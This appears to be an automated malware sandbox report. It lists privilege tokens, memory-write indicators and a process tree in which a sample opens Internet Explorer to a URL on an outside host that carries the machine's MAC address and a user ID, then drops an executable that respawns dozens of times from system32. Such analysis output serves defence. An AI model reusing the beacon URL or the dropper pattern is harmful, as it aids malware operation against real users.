1076 sUUAXgs.exe Token: SeLoadDriverPrivilege 1960 sUUAXgs.exe Token: SeLoadDriverPrivilege 2040 sUUAXgs.exe Token: SeLoadDriverPrivilege 748 sUUAXgs.exe Token: SeLoadDriverPrivilege 1892 sUUAXgs.exe Token: SeLoadDriverPrivilege 1544 sUUAXgs.exe Token: SeLoadDriverPrivilege 1540 sUUAXgs.exe Token: SeLoadDriverPrivilege 108 sUUAXgs.exe Token: SeLoadDriverPrivilege 2220 sUUAXgs.exe Token: SeLoadDriverPrivilege 2968 sUUAXgs.exe Token: SeLoadDriverPrivilege 2228 sUUAXgs.exe Token: SeLoadDriverPrivilege 3052 sUUAXgs.exe Token: SeLoadDriverPrivilege 2208 sUUAXgs.exe Token: SeLoadDriverPrivilege 1252 sUUAXgs.exe Token: SeLoadDriverPrivilege 1504 sUUAXgs.exe Token: SeLoadDriverPrivilege 1668 sUUAXgs.exe Token: SeLoadDriverPrivilege 868 sUUAXgs.exe Token: SeLoadDriverPrivilege 2436 sUUAXgs.exe Token: SeLoadDriverPrivilege 2468 sUUAXgs.exe Token: SeLoadDriverPrivilege 1608 sUUAXgs.exe Token: SeLoadDriverPrivilege 1600 sUUAXgs.exe Token: SeLoadDriverPrivilege 1520 sUUAXgs.exe Token: SeLoadDriverPrivilege 2260 sUUAXgs.exe Token: SeLoadDriverPrivilege 2680 sUUAXgs.exe Token: SeLoadDriverPrivilege 2796 sUUAXgs.exe Token: SeLoadDriverPrivilege 2372 sUUAXgs.exe Token: SeLoadDriverPrivilege 2692 sUUAXgs.exe Token: SeLoadDriverPrivilege 2824 sUUAXgs.exe Token: SeLoadDriverPrivilege 2740 sUUAXgs.exe Token: SeLoadDriverPrivilege 2188 sUUAXgs.exe Token: SeLoadDriverPrivilege 1032 sUUAXgs.exe Token: SeLoadDriverPrivilege 2644 sUUAXgs.exe Token: SeLoadDriverPrivilege 2540 sUUAXgs.exe Token: SeLoadDriverPrivilege 2608 sUUAXgs.exe Token: SeLoadDriverPrivilege 2580 sUUAXgs.exe Token: SeLoadDriverPrivilege 2196 sUUAXgs.exe Token: SeLoadDriverPrivilege 1532 sUUAXgs.exe Token: SeLoadDriverPrivilege 2788 sUUAXgs.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2288 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2288 IEXPLORE.EXE 2288 IEXPLORE.EXE 2720 IEXPLORE.EXE 2720 IEXPLORE.EXE 2720 IEXPLORE.EXE 2720 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 524 wrote to memory of 2176 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 31 PID 524 wrote to memory of 2176 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 31 PID 524 wrote to memory of 2176 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 31 PID 524 wrote to memory of 2176 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 31 PID 2176 wrote to memory of 2288 2176 iexplore.exe 32 PID 2176 wrote to memory of 2288 2176 iexplore.exe 32 PID 2176 wrote to memory of 2288 2176 iexplore.exe 32 PID 2176 wrote to memory of 2288 2176 iexplore.exe 32 PID 2288 wrote to memory of 2720 2288 IEXPLORE.EXE 33 PID 2288 wrote to memory of 2720 2288 IEXPLORE.EXE 33 PID 2288 wrote to memory of 2720 2288 IEXPLORE.EXE 33 PID 2288 wrote to memory of 2720 2288 IEXPLORE.EXE 33 PID 524 wrote to memory of 2388 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 34 PID 524 wrote to memory of 2388 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 34 PID 524 wrote to memory of 2388 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 34 PID 524 wrote to memory of 2388 524 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 34 PID 2388 wrote to memory of 2664 2388 FVe1JJh.exe 35 PID 2388 wrote to memory of 2664 2388 FVe1JJh.exe 35 PID 2388 wrote to memory of 2664 2388 FVe1JJh.exe 35 PID 2388 wrote to memory of 2664 2388 FVe1JJh.exe 35 PID 2664 wrote to memory of 2860 2664 sUUAXgs.exe 36 PID 2664 wrote to memory of 2860 2664 sUUAXgs.exe 36 PID 2664 wrote to memory of 2860 2664 sUUAXgs.exe 36 PID 2664 wrote to memory of 2860 2664 sUUAXgs.exe 36 PID 2860 wrote to memory of 2936 2860 sUUAXgs.exe 37 PID 2860 wrote to memory of 2936 2860 sUUAXgs.exe 37 PID 2860 wrote to memory of 2936 2860 sUUAXgs.exe 37 PID 2860 wrote to memory of 2936 2860 sUUAXgs.exe 37 PID 2936 wrote to memory of 2708 2936 sUUAXgs.exe 38 PID 2936 wrote to memory of 2708 2936 sUUAXgs.exe 38 PID 2936 wrote to memory of 2708 2936 sUUAXgs.exe 38 PID 2936 wrote to memory of 2708 2936 sUUAXgs.exe 38 PID 2708 wrote to memory of 2528 2708 sUUAXgs.exe 39 PID 2708 wrote to memory of 2528 2708 sUUAXgs.exe 39 PID 2708 wrote to memory of 2528 2708 sUUAXgs.exe 39 PID 2708 wrote to memory of 2528 2708 sUUAXgs.exe 39 PID 2528 wrote to memory of 2572 2528 sUUAXgs.exe 40 PID 2528 wrote to memory of 2572 2528 sUUAXgs.exe 40 PID 2528 wrote to memory of 2572 2528 sUUAXgs.exe 40 PID 2528 wrote to memory of 2572 2528 sUUAXgs.exe 40 PID 2572 wrote to memory of 2232 2572 sUUAXgs.exe 41 PID 2572 wrote to memory of 2232 2572 sUUAXgs.exe 41 PID 2572 wrote to memory of 2232 2572 sUUAXgs.exe 41 PID 2572 wrote to memory of 2232 2572 sUUAXgs.exe 41 PID 2232 wrote to memory of 2104 2232 sUUAXgs.exe 42 PID 2232 wrote to memory of 2104 2232 sUUAXgs.exe 42 PID 2232 wrote to memory of 2104 2232 sUUAXgs.exe 42 PID 2232 wrote to memory of 2104 2232 sUUAXgs.exe 42 PID 2104 wrote to memory of 2748 2104 sUUAXgs.exe 43 PID 2104 wrote to memory of 2748 2104 sUUAXgs.exe 43 PID 2104 wrote to memory of 2748 2104 sUUAXgs.exe 43 PID 2104 wrote to memory of 2748 2104 sUUAXgs.exe 43 PID 2748 wrote to memory of 1664 2748 sUUAXgs.exe 44 PID 2748 wrote to memory of 1664 2748 sUUAXgs.exe 44 PID 2748 wrote to memory of 1664 2748 sUUAXgs.exe 44 PID 2748 wrote to memory of 1664 2748 sUUAXgs.exe 44 PID 1664 wrote to memory of 1784 1664 sUUAXgs.exe 45 PID 1664 wrote to memory of 1784 1664 sUUAXgs.exe 45 PID 1664 wrote to memory of 1784 1664 sUUAXgs.exe 45 PID 1664 wrote to memory of 1784 1664 sUUAXgs.exe 45 PID 1784 wrote to memory of 2068 1784 sUUAXgs.exe 46 PID 1784 wrote to memory of 2068 1784 sUUAXgs.exe 46 PID 1784 wrote to memory of 2068 1784 sUUAXgs.exe 46 PID 1784 wrote to memory of 2068 1784 sUUAXgs.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=CE:96:44:F3:BB:BD&UserId=117&Bate=1.06&ThreadNum=3&Url=;-2⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=CE:96:44:F3:BB:BD&UserId=117&Bate=1.06&ThreadNum=3&Url=;-3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2288 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2720
-
-
-
-
\??\c:\FVe1JJh.exec:\FVe1JJh.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe10⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe13⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe14⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2068 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe15⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe16⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe17⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2876 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe18⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe19⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2896 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe20⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3056 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe21⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2184 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe22⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1428 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe23⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:380 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe24⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2960 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe25⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe26⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:736 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe27⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1076 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe28⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe29⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2040 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe30⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:748 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe31⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1892 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe32⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1544 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe33⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe34⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:108 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe35⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2220 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe36⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2968 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe37⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2228 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe38⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3052 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe39⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2208 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe40⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1252 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe41⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1504 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1668 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe43⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe44⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2436 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe45⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2468 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe46⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe47⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1600 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe48⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1520 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe49⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2260 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe50⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2680 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe51⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe52⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2372 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe53⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2692 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe54⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2824 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe55⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2740 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe56⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe57⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1032 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe58⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2644 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe59⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2540 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe60⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2608 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe61⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2580 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe62⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2196 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe63⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1532 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe64⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2788 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe65⤵
- Executes dropped EXE
PID:1548 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe66⤵PID:1620
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe67⤵PID:2600
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe68⤵PID:2752
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe69⤵PID:2000
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe70⤵PID:1432
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe71⤵
- Enumerates connected drives
PID:1396 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe72⤵PID:1760
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe73⤵PID:2028
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe74⤵PID:2632
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe75⤵
- Enumerates connected drives
PID:2384 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe76⤵PID:2348
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe77⤵PID:1980
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe78⤵PID:1480
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe79⤵PID:2656
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe80⤵PID:2952
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe81⤵PID:1244
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe82⤵PID:1632
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe83⤵PID:888
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe84⤵PID:624
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe85⤵PID:1564
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe86⤵
- Drops file in System32 directory
PID:1404 -
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe87⤵PID:552
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe88⤵PID:1964
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe89⤵PID:2420
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe90⤵PID:984
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe91⤵PID:2168
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe92⤵PID:2352
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe93⤵PID:2380
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe94⤵PID:3048
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe95⤵PID:2904
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe96⤵PID:1288
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe97⤵PID:1528
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe98⤵PID:1940
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe99⤵PID:1228
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe100⤵PID:2976
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe101⤵PID:1272
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe102⤵PID:944
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe103⤵PID:1124
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe104⤵PID:568
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe105⤵PID:1284
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe106⤵PID:2616
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe107⤵PID:1920
-
C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exeC:\Windows\system32\v7Fqtqd\sUUAXgs.exe108⤵PID:2648
-
